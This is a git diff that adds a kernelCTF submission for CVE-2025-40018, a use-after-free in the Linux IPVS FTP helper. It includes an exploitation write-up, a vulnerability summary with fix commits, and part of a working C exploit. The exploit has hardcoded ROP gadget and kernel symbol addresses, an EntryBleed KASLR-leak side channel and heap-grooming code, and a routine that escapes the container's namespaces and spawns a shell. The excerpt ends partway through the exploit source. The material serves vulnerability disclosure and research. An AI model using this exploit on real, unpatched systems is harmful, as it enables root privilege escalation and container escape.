diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md new file mode 100644 index 000000000..d8293e5bd --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md @@ -0,0 +1,274 @@ +## 1. Overview + +The vulnerability exists in the IP Virtual Server (IPVS) FTP helper module (`ip_vs_ftp`) and involves a Use-After-Free (UAF) in the module exit path. It occurs when the FTP application structure is freed during network namespace cleanup while still being referenced by active connections, leading to a UAF during connection flushing. + +## 2. Root Cause Analysis + +### 2.1. Module Exit and Application Free + +When a network namespace is destroyed, the kernel iterates through the exit handlers of all registered per-netns subsystems. The `ip_vs_ftp` module registers its exit handler, `__ip_vs_ftp_exit()`, which is executed before the core IPVS cleanup handler. + +In `__ip_vs_ftp_exit()`, the `unregister_ip_vs_app()` function is called to remove the FTP application. + +```c +static void __ip_vs_ftp_exit(struct net *net) +{ + struct netns_ipvs *ipvs = net_ipvs(net); + // [...] + unregister_ip_vs_app(ipvs, &ip_vs_ftp); +} +``` + +Inside `unregister_ip_vs_app()`, the `struct ip_vs_app` object representing the application template (variable `a`) is freed immediately using `kfree(a)` [1]. + +It is worth noting that the incarnations (`inc`) are also released via `ip_vs_app_inc_release()` [2], which uses `call_rcu`. Therefore, while `inc` remains memory-safe during the subsequent RCU-protected connection flush, it contains a pointer (`inc->app`) to the template `a` which has been freed immediately. This makes `inc->app` a dangling pointer, and `a` the victim object for exploitation. + +```c +void unregister_ip_vs_app(struct netns_ipvs *ipvs, struct ip_vs_app *app) +{ + struct ip_vs_app *a, *anxt, *inc, *nxt; + mutex_lock(&__ip_vs_app_mutex); + + list_for_each_entry_safe(a, anxt, &ipvs->app_list, a_list) { + // [...] + list_for_each_entry_safe(inc, nxt, &a->incs_list, a_list) { + ip_vs_app_inc_release(ipvs, inc); // [2] + } + + list_del(&a->a_list); + kfree(a); // [1] The application template is freed immediately! + // [...] + } + mutex_unlock(&__ip_vs_app_mutex); +} +``` + +### 2.2. Connection Cleanup and UAF + +Following the execution of `__ip_vs_ftp_exit()`, the core IPVS cleanup handler `__ip_vs_cleanup_batch()` runs. This function flushes all remaining connections in the namespace. + +```c +static void __net_exit __ip_vs_cleanup_batch(struct list_head *net_list) +{ + // [...] + list_for_each_entry(net, net_list, exit_list) { + ipvs = net_ipvs(net); + ip_vs_conn_net_cleanup(ipvs); // [3] Flushes connections + // [...] + } +} +``` + +The connection flush path eventually reaches `ip_vs_unbind_app()`, which attempts to decrement the reference count of the application associated with the connection. + +```c +void ip_vs_unbind_app(struct ip_vs_conn *cp) +{ + struct ip_vs_app *inc = cp->app; + // [...] + ip_vs_app_inc_put(inc); // [4] + cp->app = NULL; +} +``` + +`ip_vs_app_inc_put()` decrements the incarnation's use count and then calls `ip_vs_app_put()` on the parent application. + +```c +void ip_vs_app_inc_put(struct ip_vs_app *inc) +{ + atomic_dec(&inc->usecnt); + ip_vs_app_put(inc->app); // [5] Accesses inc->app (which is 'a' from [1]) +} + +static inline void ip_vs_app_put(struct ip_vs_app *app) +{ + module_put(app->module); // [6] UAF: Dereferences app->module +} +``` + +The vulnerability manifests at [6]. The pointer `app` refers to the object `a` that was freed at [1]. Dereferencing `app->module` constitutes a Use-After-Free. + +### 2.3. The Race Window + +The vulnerability is a deterministic Use-After-Free where the object is freed and used in the same kernel thread. To exploit it, we must artificially create a race condition to reclaim the memory between these two events. + +#### Normal Execution + +In a normal scenario: + +``` +CPU 0 (netns cleanup kthread) +----------------------------- +__ip_vs_ftp_exit() + kfree(app) // [Free] + +__ip_vs_cleanup_batch() + ip_vs_conn_net_cleanup() + ip_vs_unbind_app() + ip_vs_app_put(app) + module_put(app->module) // [UAF] - Dereferencing freed memory +``` + +#### Exploitation (Winning the Race) + +The exploit uses a timer interrupt to stall CPU 0, allowing CPU 1 to reclaim the freed object: + +``` +CPU 0 (netns cleanup kthread) CPU 1 (Spray Thread) +----------------------------- -------------------- +__ip_vs_ftp_exit() + kfree(app) // [Free] + +< TimerFD Interrupt Fires > +< HardIRQ -> SoftIRQ > +< Stall: Churning huge waitqueue > + Spray user_key_payload + // [Reclaim] 'app' slot allocated + // Fake object written + +< Cleanup Resumes > +__ip_vs_cleanup_batch() + ip_vs_conn_net_cleanup() + ip_vs_unbind_app() + ip_vs_app_put(app) + module_put(app->module) // [UAF] - Dec(controlled addr) +``` + +## 3. Exploitation + +### 3.1. Primitive + +The UAF primitive allows us to perform an **Arbitrary Address Decrement**. +When `module_put(app->module)` is called on the reclaimed fake object: +1. We control `app->module`. Let's set it to `TARGET_ADDR - offsetof(struct module, refcnt)`. +2. `module_put` executes `atomic_dec(&module->refcnt)`. +3. This results in `atomic_dec(TARGET_ADDR)`. + +We use this primitive to corrupt the `next` pointer of a `msg_msg` object, creating overlapping chunks on the kernel heap. + +### 3.2. Triggering the Vulnerability + +The exploitation involves two main components: +1. **Cleaner Thread (CPU 0):** The kernel worker thread processing `cleanup_net`. This thread performs the Free and the Use. +2. **Sprayer Thread (CPU 1):** The attacker thread running on a separate CPU. This thread handles heap grooming and the reclamation spray. + +#### 3.2.1. Heap Grooming (CPU 1) + +We target the `kmalloc-256` cache where `struct ip_vs_app` resides. +1. **Spray `pg_vec`:** We spray `pg_vec` to fill slabs on CPU 1. +2. **Create Holes:** We close specific sockets to create free slots for the victim object. +3. **Allocate Victim:** We trigger `unshare(CLONE_NEWNET)` to allocate the `ip_vs_ftp` application into one of our prepared slots on CPU 1. +4. **Cross-CPU Slab Freeze:** We free an *additional* object in the victim's slab. This transitions the slab from "Full" to "Partial" on CPU 1. + +**Why Freeze?** When `kfree(app)` occurs on CPU 0, the object is returned to its owning slab. Since the slab is on CPU 1's partial list, CPU 1 can immediately reallocate from it. If we didn't do this before exiting netns, the object will be freed into a per-cpu cache on CPU 0 during `cleanup_net()`, making it impossible for CPU 1 to reclaim. + +```c +static void freeze_victim_slab() { + // Free one object per slab to transition FULL -> PARTIAL on CPU 1 + for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) { + close(packet_fds[i + SLOTS_PER_SLAB]); + packet_fds[i + SLOTS_PER_SLAB] = -1; + } +} +``` + +#### 3.2.2. Binding the Vulnerable Object + +To trigger the UAF, we must create a dependency between a persistent `ip_vs_conn` and the victim object (`ip_vs_app`). + +The exploit sets up an IPVS service on port 21 (FTP) and establishes a TCP connection to it. When the connection is created in `ip_vs_conn_new()`, the kernel checks if the protocol has any registered applications. Since `ip_vs_ftp` is registered for port 21, the connection is automatically bound to the FTP application incarnation. + +```c +// net/netfilter/ipvs/ip_vs_conn.c +struct ip_vs_conn * +ip_vs_conn_new(...) +{ + // ... + if (unlikely(pd && atomic_read(&pd->appcnt))) + ip_vs_bind_app(cp, pd->pp); + // ... +} + +// net/netfilter/ipvs/ip_vs_proto_tcp.c +static int +tcp_app_conn_bind(struct ip_vs_conn *cp) +{ + // ... + list_for_each_entry_rcu(inc, &ipvs->tcp_apps[hash], p_list) { + if (inc->port == cp->vport) { + // ... + cp->app = inc; // [1] Connection bound to FTP incarnation + // ... + } + } + return result; +} +``` + +This binding (`cp->app`) is critical. When the namespace is destroyed, `ip_vs_conn_flush()` cleans up this connection, accessing `cp->app->app`—the object that has just been freed by `ip_vs_ftp_exit`. + +#### 3.2.3. Extending the Race Window (Timerfd Storm) + +To reclaim the object between the Free and the Use on CPU 0, we employ a technique that transforms a tiny kernel race window into a large, hit-able target by racing against a hardware timer. + +1. **Timerfd:** We create a `timerfd` and arm it to fire *exactly* when the cleanup thread is executing the critical section on CPU 0. +2. **Waitqueue Churn:** We attach thousands of `epoll` instances to this `timerfd`. When the timer expires, the hardware raises an interrupt on CPU 0. The interrupt handler wakes up all waiters on the `timerfd`. Because we have attached a massive number of `epoll` entries, the kernel is forced to churn through this list. +3. **The Stall:** This massive "thundering herd" effectively stalls the execution of the cleanup thread on CPU 0 for milliseconds, turning a microsecond-scale race into a stable, millisecond-scale window. + +```c + tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0)); + do_epoll_enqueue(tfd, 17); // Enqueue thousands of epoll items + + // ... inside the race loop ... + // Arm timer to fire just as cleanup_net starts + timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL); +``` + +#### 3.2.4. Reclaiming with `user_key_payload` + +While CPU 0 is stalled, CPU 1 continuously sprays `user_key_payload` objects using `add_key()`. These objects fit in `kmalloc-256` and allow us to write arbitrary data into the freed object. + +```c +void *spray_job(void *arg) { + bind_to_cpu(1); + while (1) { + // ... synchronization ... + spray_userkey(); // Reclaim the freed slot + // ... synchronization ... + cleanup_userkey(); + } +} +``` + +We craft the payload to fake `struct ip_vs_app`, setting the `module` pointer to target our `msg_msg` object. + +```c +static inline void set_dec_addr(uint64_t target) { + char *fake_ip_vs_app = user_key_payload; + // Point app->module to (Target Address - refcnt_offset) + *(uint64_t *)&fake_ip_vs_app[IP_VS_APP_OFFSETS_MODULE] = target - MODULE_OFFSETS_REFCNT; +} +``` + +### 3.3. Bypass KASLR + +The vulnerability primitive does not provide a way to leak kernel addresses and is only exploitable when a valid kernel text address is known, as setting the `module` pointer requires it. + +To address this, we use EntryBleed, a time-based side-channel attack, to leak the kernel base address. More details can be found at https://www.willsroot.io/2022/12/entrybleed.html or other kernelCTF submissions. + +### 3.4. Privilege Escalation (Msg_msg Overlap) + +1. **Heap Spray:** We spray ~1.37 GB of `msg_msg` objects to land one at a predictable physical address (`GUESSED_MSG_ADDR`). +2. **Corrupt `next`:** The UAF primitive decrements the `next` pointer of a message header. This causes it to point to a previous message's segment, creating two overlapping `msg_msgseg` objects. +3. **UAF on `pipe_buffer`:** + * We free the *first* overlapping segment (victim). + * We spray `pipe_buffer` objects, which are allocated into the now-freed slot. + * We free the *second* overlapping segment (target). Since they overlap, this frees the memory occupied by the `pipe_buffer`, creating a Use-After-Free condition on the `pipe_buffer` object. +4. **ROP Chain:** + * We spray `msg_msgseg` objects again to reclaim the freed `pipe_buffer` slot with controlled data. + * We overwrite the `pipe_buffer->ops` pointer with a fake vtable pointing to our gadgets. + * Triggering `pipe_release()` (by closing the pipe) invokes the fake release function, pivoting the stack to execute the ROP chain. + +### 3.5. Container Escape + +The exploit runs inside a container. The ROP chain includes a call to `switch_task_namespaces(init_nsproxy)` to switch the process back to the host's initial namespace, effectively breaking out of the container before spawning a root shell. \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md new file mode 100644 index 000000000..de53a62cb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md @@ -0,0 +1,36 @@ +# Vulnerability +The vulnerability is a Use-After-Free (UAF) issue in the IPVS subsystem caused by incorrect cleanup ordering during network namespace destruction. The FTP application helper (`ip_vs_ftp`) frees its application structure (`struct ip_vs_app`) in its exit handler `__ip_vs_ftp_exit`, which runs before the core IPVS cleanup handler `__ip_vs_cleanup_batch`. When `__ip_vs_cleanup_batch` subsequently flushes active connections, it dereferences the now-freed application structure via `cp->app->app`, leading to a UAF. + +## Requirements to trigger the vulnerability +- Capabilities: CAP_NET_ADMIN +- Kernel configuration: CONFIG_NETFILTER, CONFIG_IP_VS, CONFIG_IP_VS_FTP +- User namespaces needed: Yes + +## Commit which introduced the vulnerability +- [61b1ab4583e275af216c8454b9256de680499b19](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=61b1ab4583e275af216c8454b9256de680499b19) + +## Commit which fixed the vulnerability +- Fixed in 5.4.301 with commit [8a6ecab3847c213ce2855b0378e63ce839085de3](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8a6ecab3847c213ce2855b0378e63ce839085de3) +- Fixed in 5.10.246 with commit [421b1ae1574dfdda68b835c15ac4921ec0030182](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=421b1ae1574dfdda68b835c15ac4921ec0030182) +- Fixed in 5.15.195 with commit [1d79471414d7b9424d699afff2aa79fff322f52d](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=1d79471414d7b9424d699afff2aa79fff322f52d) +- Fixed in 6.1.156 with commit [53717f8a4347b78eac6488072ad8e5adbaff38d9](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=53717f8a4347b78eac6488072ad8e5adbaff38d9) +- Fixed in 6.6.112 with commit [8cbe2a21d85727b66d7c591fd5d83df0d8c4f757](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8cbe2a21d85727b66d7c591fd5d83df0d8c4f757) +- Fixed in 6.12.53 with commit [dc1a481359a72ee7e548f1f5da671282a7c13b8f](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=dc1a481359a72ee7e548f1f5da671282a7c13b8f) +- Fixed in 6.17.3 with commit [a343811ef138a265407167294275201621e9ebb2](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=a343811ef138a265407167294275201621e9ebb2) +- Fixed in 6.18-rc1 with commit [134121bfd99a06d44ef5ba15a9beb075297c0821](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=134121bfd99a06d44ef5ba15a9beb075297c0821) + +## Affected kernel versions +- 5.4.0 - 5.4.300 +- 5.10.0 - 5.10.245 +- 5.15.0 - 5.15.194 +- 6.1.0 - 6.1.155 +- 6.6.0 - 6.6.111 +- 6.12.0 - 6.12.52 +- 6.17.0 - 6.17.2 + +## Affected component, subsystem +- Netfilter +- IPVS + +## Cause +- Use-After-Free \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile new file mode 100644 index 000000000..7cb8a8850 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile @@ -0,0 +1,2 @@ +exploit: exploit.c + gcc $^ -pthread -static -o $@ \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit new file mode 100755 index 000000000..dcbf4b625 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c new file mode 100644 index 000000000..f3f61b356 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c @@ -0,0 +1,913 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include + +#include +#include +#include +#include + +#define PAGE_SIZE 0x1000 + +// =-=-=-=-=-=-=-= LOG HELPERS =-=-=-=-=-=-=-= +#define COLOR_GREEN "\033[32m" +#define COLOR_RED "\033[31m" +#define COLOR_BLUE "\033[34m" +#define COLOR_DEFAULT "\033[0m" +#define COLOR_BOLD "\033[1m" +#define COLOR_BRIGHT_BLUE "\033[94m" + +#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__) +#define logi(fmt, ...) dprintf(2, COLOR_BLUE COLOR_BOLD"[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__) +#define logs(fmt, ...) dprintf(2, COLOR_GREEN COLOR_BOLD"[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__) +#define loge(fmt, ...) dprintf(2, COLOR_RED COLOR_BOLD"[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__) +#define die(fmt, ...) \ + do { \ + loge(fmt ": %m", ##__VA_ARGS__); \ + loge("Exit at line %d", __LINE__); \ + exit(1); \ + } while (0) +#define SYSCHK(x) \ + ({ \ + typeof(x) __res = (x); \ + if (__res == (typeof(x))-1) { \ + die("SYSCHK(" #x ")"); \ + } \ + __res; \ + }) + +// =-=-=-=-=-=-=-= ROP HELPERS =-=-=-=-=-=-=-= +// 0xffffffff8114067e : pop rsp ; pop r15 ; ret +#define POP_RSP_POP_R15_RET 0xffffffff8114067e +// 0xffffffff81a0f50b : push rsi ; jmp qword ptr [rsi + 0x39] +#define PUSH_RSI_JMP_QWORD_PTR_RSI_0X39 0xffffffff81a0f50b +// 0xffffffff8138288b : pop rdi ; or dh, dh ; ret +#define POP_RDI_RET 0xffffffff8138288b +// 0xffffffff81126164 : pop r12 ; pop rbp ; pop rbx ; ret +#define POP_R12_POP_RBP_POP_RBX_RET 0xffffffff81126164 +// 0xffffffff81f1beb1 : pop rsi ; or dh, dh ; ret +#define POP_RSI_RET 0xffffffff81f1beb1 +// 0xffffffff819ecfd2 : push rax ; jmp qword ptr [rsi - 0x7f] +#define PUSH_RAX_JMP_QWORD_PTR_RSI_MINUS_0x7f 0xffffffff819ecfd2 + +#define INIT_CRED 0xffffffff83a75f00 +#define INIT_NSPROXY 0xffffffff83a75cc0 +#define COMMIT_CREDS 0xffffffff811d55b0 +#define SWITCH_TASK_NAMESPACES 0xffffffff811d3a30 +#define FIND_TASK_BY_VPID 0xffffffff811cbf20 +#define INIT_TASK 0xffffffff83a15a40 +#define PREPARE_KERNEL_CRED 0xffffffff811d5850 +#define RET2USERMODE 0xffffffff824011c6 + +uint64_t cs, rsp, ss, rflags; + +static void save_status() { + asm( + "movq %%cs, %0\n" + "movq %%ss, %1\n" + "pushfq\n" + "popq %2\n" + "movq %%rsp, %3\n" + : "=r" (cs), "=r" (ss), "=r" (rflags), "=r" (rsp) : : "memory" ); +} + +void win(void){ + logs("exploit success!!"); + // escape pid/mount/network/ipc namespace + setns(open("/proc/1/ns/mnt", O_RDONLY), 0); + setns(open("/proc/1/ns/pid", O_RDONLY), 0); + setns(open("/proc/1/ns/net", O_RDONLY), 0); + char* shell[] = { + "/bin/sh", + "-c", + "/bin/cat /flag && echo ; echo o>/proc/sysrq-trigger", + NULL, + }; + execve(shell[0], shell, NULL); + exit(0); +} + +// =-=-=-=-=-=-=-= UTILS =-=-=-=-=-=-=-= +void write_file(const char * filename, const char * buf) { + int fd = open(filename, O_WRONLY | O_CLOEXEC); + if (fd < 0) die("open"); + if (write(fd, buf, strlen(buf)) != strlen(buf)) die("write"); + close(fd); +} + +static void setup_namespace(void) { + char uid_map[128]; + char gid_map[128]; + uid_t uid = getuid(); + gid_t gid = getgid(); + if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET | CLONE_NEWIPC)) + die("unshare"); + sprintf(uid_map, "0 %d 1\n", uid); + sprintf(gid_map, "0 %d 1\n", gid); + write_file("/proc/self/uid_map", uid_map); + write_file("/proc/self/setgroups", "deny"); + write_file("/proc/self/gid_map", gid_map); +} + +static void bring_interface_up(const char *ifname) +{ + int sockfd; + struct ifreq ifr; + sockfd = socket(AF_INET, SOCK_DGRAM, 0); + if (sockfd < 0) + die("socket"); + memset(&ifr, 0, sizeof ifr); + strncpy(ifr.ifr_name, ifname, IFNAMSIZ); + ifr.ifr_flags |= IFF_UP; + ioctl(sockfd, SIOCSIFFLAGS, &ifr); + close(sockfd); +} + +static void bind_to_cpu(int core){ + cpu_set_t cpu_set; + CPU_ZERO(&cpu_set); + CPU_SET(core, &cpu_set); + if (sched_setaffinity(0, sizeof(cpu_set_t), &cpu_set) == -1) + die("sched_setaffinity"); +} + +// ========-=-=-=-=-= TIMERFD RACE HELPERS =-=-=-=-=-=-=-= +int count; +char buf[0x1000]; +int timefds[0x1000]; +int epfds[0x1000]; +int tfd; +pid_t childs[0x10]; +pthread_barrier_t barr; +int ncpus; + +static void barrier(pthread_barrier_t *barr) +{ + int ret = pthread_barrier_wait(barr); + assert(!ret || ret == PTHREAD_BARRIER_SERIAL_THREAD); +} + +static void epoll_ctl_add(int epfd, int fd, uint32_t events) +{ + struct epoll_event ev; + ev.events = events; + ev.data.fd = fd; + SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev)); +} + +static void do_epoll_enqueue(int fd, int f) +{ + int cfd[2]; + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); + for (int k = 0; k < f; k++) + { + childs[k] = fork(); + if (childs[k] == 0) + { + for (int i = 0; i < 0xd0; i++) + { + timefds[i] = SYSCHK(dup(fd)); + } + for (int i = 0; i < 0xd0; i++) + { + epfds[i] = SYSCHK(epoll_create(0x1)); + } + for (int i = 0; i < 0xd0; i++) + { + for (int j = 0; j < 0xd0; j++) + { + epoll_ctl_add(epfds[i], timefds[j], 0); + } + } + write(cfd[1], buf, 1); + raise(SIGSTOP); + } + read(cfd[0], buf, 1); + } +} + +// =-=-=-=-=-=-=-= ENTRYBLEED HELPERS =-=-=-=-=-=-=-= +// https://www.willsroot.io/2022/12/entrybleed.html +#define KERNEL_BASE 0xffffffff81000000 +#define KERNEL_LOWER_BOUND 0xffffffff80000000ull +#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull + +#define STEP_KERNEL 0x100000ull +#define SCAN_START_KERNEL KERNEL_LOWER_BOUND +#define SCAN_END_KERNEL KERNEL_UPPER_BOUND +#define ARR_SIZE_KERNEL (SCAN_END_KERNEL - SCAN_START_KERNEL) / STEP_KERNEL + +#define PHYS_LOWER_BOUND 0xffff888000000000ull +#define PHYS_UPPER_BOUND 0xfffffe0000000000ull + +#define STEP_PHYS 0x40000000ull +#define SCAN_START_PHYS PHYS_LOWER_BOUND +#define SCAN_END_PHYS PHYS_UPPER_BOUND +#define ARR_SIZE_PHYS (SCAN_END_PHYS - SCAN_START_PHYS) / STEP_PHYS + +#define DUMMY_ITERATIONS 5 +#define ITERATIONS 100 +#define LEAK_TIMES 5 + +// Based on experiment, the kernel heap address leaked from sidechannel is KERNEL_PHYS_MAP + LEAKED_OFFSET +#define LEAKED_OFFSET 0x100000000 + +uint64_t leak_kernel_base, leak_kheap_base, kernel_offset = 0; + +uint64_t sidechannel(uint64_t addr) { + uint64_t a, b, c, d; + asm volatile ( + ".intel_syntax noprefix;" + "mfence;" + "rdtscp;" + "mov %0, rax;" + "mov %1, rdx;" + "xor rax, rax;" + "lfence;" + "prefetchnta qword ptr [%4];" + "prefetcht2 qword ptr [%4];" + "xor rax, rax;" + "lfence;" + "rdtscp;" + "mov %2, rax;" + "mov %3, rdx;" + "mfence;" + ".att_syntax;" + : "=r" (a), "=r" (b), "=r" (c), "=r" (d) + : "r" (addr) + : "rax", "rbx", "rcx", "rdx" + ); + a = (b << 32) | a; + c = (d << 32) | c; + return c - a; +} + +uint64_t prefetch(int phys) { + uint64_t arr_size = ARR_SIZE_KERNEL; + uint64_t scan_start = SCAN_START_KERNEL; + uint64_t step_size = STEP_KERNEL; + if (phys) + { + arr_size = ARR_SIZE_PHYS; + scan_start = SCAN_START_PHYS; + step_size = STEP_PHYS; + } + + uint64_t *data = malloc(arr_size * sizeof(uint64_t)); + memset(data, 0, arr_size * sizeof(uint64_t)); + uint64_t addr = ~0; + + for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) { + for (uint64_t idx = 0; idx < arr_size; idx++) { + uint64_t test = scan_start + idx * step_size; + syscall(104); + uint64_t time = sidechannel(test); + if (i >= DUMMY_ITERATIONS) { + data[idx] += time; + } + } + } + for (int i = 0; i < arr_size; i++) { + data[i] /= ITERATIONS; + } + double initial_avg = 0.0; + for (int i = 0; i < arr_size; i++) { + initial_avg += data[i]; + } + initial_avg /= arr_size; + double background_avg = 0.0; + int count = 0; + for (int i = 0; i < arr_size; i++) { + if (data[i] <= initial_avg * 1.1) { + background_avg += data[i]; + count++; + } + } + if (count > 0) { + background_avg /= count; + } else { + background_avg = initial_avg; + } + // Select the first address whose time is lower than threshold as target address + // threshold = 0.9 * average_time + double threshold = background_avg * 0.9; + for (int i = 0; i < arr_size; i++) { + if (data[i] < threshold) { + addr = scan_start + i * step_size; + break; + } + } + return addr; +} + +size_t mostFrequent(size_t *arr, size_t n) +{ + size_t maxcount = 0; + size_t element_having_max_freq; + for (int i = 0; i < n; i++) + { + size_t Count = 0; + for (int j = 0; j < n; j++) + { + if (arr[i] == arr[j]) + Count++; + } + if (Count > maxcount) + { + maxcount = Count; + element_having_max_freq = arr[i]; + } + } + return element_having_max_freq; +} + +void leak() { + size_t kbase[LEAK_TIMES] = {0}; + size_t kheap_base[LEAK_TIMES] = {0}; + for (int i = 0; i < LEAK_TIMES; i++) + { + kbase[i] = prefetch(0); + logd("%dth iteration leak: 0x%lx", i, kbase[i]); + } + for (int i = 0; i < LEAK_TIMES; i++) + { + kheap_base[i] = prefetch(1) - LEAKED_OFFSET; + logd("%dth iteration leak: 0x%lx", i, kheap_base[i]); + } + + leak_kernel_base = mostFrequent(kbase, LEAK_TIMES); + kernel_offset = leak_kernel_base - KERNEL_BASE; + leak_kheap_base = mostFrequent(kheap_base, LEAK_TIMES); + + logs("Chosen KASLR base: %lx", leak_kernel_base); + logs("Chosen KHEAP base: %lx", leak_kheap_base); + logs("kernel offset: %lx", kernel_offset); +} + +// =-=-=-=-=-=-=-= PG_VEC HELPERS =-=-=-=-=-=-=-= +static void packet_socket_rx_ring_init(int s, unsigned int block_size, + unsigned int frame_size, unsigned int block_nr, + unsigned int sizeof_priv, unsigned int timeout) { + int v = TPACKET_V3; + if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)) < 0) + die("setsockopt(PACKET_VERSION)"); + + struct tpacket_req3 req; + memset(&req, 0, sizeof(req)); + req.tp_block_size = block_size; + req.tp_frame_size = frame_size; + req.tp_block_nr = block_nr; + req.tp_frame_nr = (block_size * block_nr) / frame_size; + req.tp_retire_blk_tov = timeout; + req.tp_sizeof_priv = sizeof_priv; + + if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)) < 0) + die("setsockopt(PACKET_RX_RING)"); +} + +static int packet_socket_setup(unsigned int block_size, unsigned int frame_size, + unsigned int block_nr, unsigned int sizeof_priv, int timeout) { + int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)); + if (s < 0) die("socket(AF_PACKET)"); + + packet_socket_rx_ring_init(s, block_size, frame_size, block_nr, + sizeof_priv, timeout); + + struct sockaddr_ll sa; + memset(&sa, 0, sizeof(sa)); + sa.sll_family = PF_PACKET; + sa.sll_protocol = htons(ETH_P_ALL); + sa.sll_ifindex = if_nametoindex("lo"); + + if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) + die("bind(AF_PACKET)"); + + return s; +} + +// We use kmalloc-256 pg_vec as spray object +#define KMALLOC256_SIZE 256 +#define KMALLOC256_PAGE_CNT ((KMALLOC256_SIZE) / sizeof(void *)) +static int alloc_kmalloc_256_pg_vec() { + return packet_socket_setup(PAGE_SIZE, 2048, KMALLOC256_PAGE_CNT, 0, 100); +} +/* + * Victim object: ip_vs_app (kmalloc-256), allocated by unshare(CLONE_NEW_NET) + * But unshare(CLONE_NEW_NET) allocates many objects in kmalloc-256 in a row: + * (20 objs) (victim obj) (40+ objs), victim obj is the 21th + */ +#define VICTIM_ALLOC_POSITION 21 +#define KMALLOC_256_OBJS_PER_SLAB 16 +// We choose SLOTS_PER_SLAB=8 based on experiment +#define SLOTS_PER_SLAB 8 +#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d)) +#define SPRAY_SLABS (DIV_ROUND_UP(VICTIM_ALLOC_POSITION, SLOTS_PER_SLAB)) +#define PACKET_SPRAY_CNT (KMALLOC_256_OBJS_PER_SLAB * SPRAY_SLABS) + +int packet_fds[PACKET_SPRAY_CNT]; +// After spraying kmalloc-256 pg_vec and freeing some pg_vec to create slots, +// the victim obj allocated later has high chance to locates in the slots. +static void spray_pg_vec_and_create_slots() { + memset(packet_fds, 0, sizeof(packet_fds)); + for (int i = 0; i < PACKET_SPRAY_CNT; i++) { + packet_fds[i] = alloc_kmalloc_256_pg_vec(); + if (packet_fds[i] < 0) die("alloc_kmalloc_256_pg_vec"); + } + for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) { + for (int j = 0; j < SLOTS_PER_SLAB; j++) { + close(packet_fds[i + j]); + packet_fds[i + j] = -1; + } + } +} + +/* CPU #0: netns cleanup kthread (free-and-then-use) / CPU #1: spray thread + * After unshare(CLONE_NEW_NET), the slab that the victim is on becomes full. + * When a full slab becomes partial, it will be put in the current CPU's + * partial list. + * We should do full-->partial transition for the slab on CPU #1 in + * advance for cross-cpu allocation. + * If not, the slab's full-->partial transition will happen in kthread on + * CPU #0, and it will be put in CPU #0's partial list. We will be unable + * to reclaim the victim from spray thread on CPU #1. + * Since the victim locates in the slots with pg_vec on the same slab, + * free some pg_vec(1 per slab) on CPU #1 to make the slab full-->partial. + */ +static void freeze_victim_slab() { + for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) { + close(packet_fds[i + SLOTS_PER_SLAB]); + packet_fds[i + SLOTS_PER_SLAB] = -1; + } +} + +static void clean_up_pg_vec() { + for (int i = 0; i < PACKET_SPRAY_CNT; i++) { + if (packet_fds[i] < 0) continue; + close(packet_fds[i]); + packet_fds[i] = -1; + } +} + +// =-=-=-=-=-=-=-= KEYRING HELPERS 